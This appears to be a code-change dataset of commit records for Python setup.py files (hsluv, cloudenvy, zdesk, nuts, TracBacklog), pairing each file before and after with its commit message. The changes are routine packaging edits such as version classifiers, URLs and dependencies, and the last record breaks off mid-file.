setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
Add official support for Python 3.10 | #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| <commit_before>#! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
<commit_msg>Add official support for Python 3.10<commit_after> | #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
Add official support for Python 3.10#! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| <commit_before>#! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
<commit_msg>Add official support for Python 3.10<commit_after>#! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
|
bfeccfd7c6d926e760f938f6073827fc0c2d3dfa | setup.py | setup.py | try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| Update github link to cloudenvy org | Update github link to cloudenvy org
| Python | apache-2.0 | cloudenvy/cloudenvy | try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
Update github link to cloudenvy org | try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| <commit_before>try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
<commit_msg>Update github link to cloudenvy org<commit_after> | try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
Update github link to cloudenvy orgtry:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| <commit_before>try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
<commit_msg>Update github link to cloudenvy org<commit_after>try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
|
101de91508d918b90c6254dc0b1cc5e0744bbd71 | setup.py | setup.py | from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| Revert "bump version for impending release" | Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec.
| Python | mit | fprimex/zdesk,blade2005/zdesk,fprimex/zdgen | from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec. | from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| <commit_before>from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
<commit_msg>Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec.<commit_after> | from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec.from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| <commit_before>from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
<commit_msg>Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec.<commit_after>from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
|
d78bcc4391f74c86eee927d9c30b58bb211d1cfe | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
| Fix extras_require for test deps | Fix extras_require for test deps
| Python | mit | thusoy/nuts-auth,thusoy/nuts-auth | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
Fix extras_require for test deps | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
| <commit_before>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
<commit_msg>Fix extras_require for test deps<commit_after> | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
Fix extras_require for test deps#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
| <commit_before>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
<commit_msg>Fix extras_require for test deps<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
|
6459acb1b96f28e43346677b6e14173e7f30b91e | setup.py | setup.py | from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
| from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
| Add simplejson as a requirement for the plugin. | Add simplejson as a requirement for the plugin. | Python | bsd-3-clause | jszakmeister/trac-backlog,jszakmeister/trac-backlog | from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
Add simplejson as a requirement for the plugin. | from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
| <commit_before>from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
<commit_msg>Add simplejson as a requirement for the plugin.<commit_after> | from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
| from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
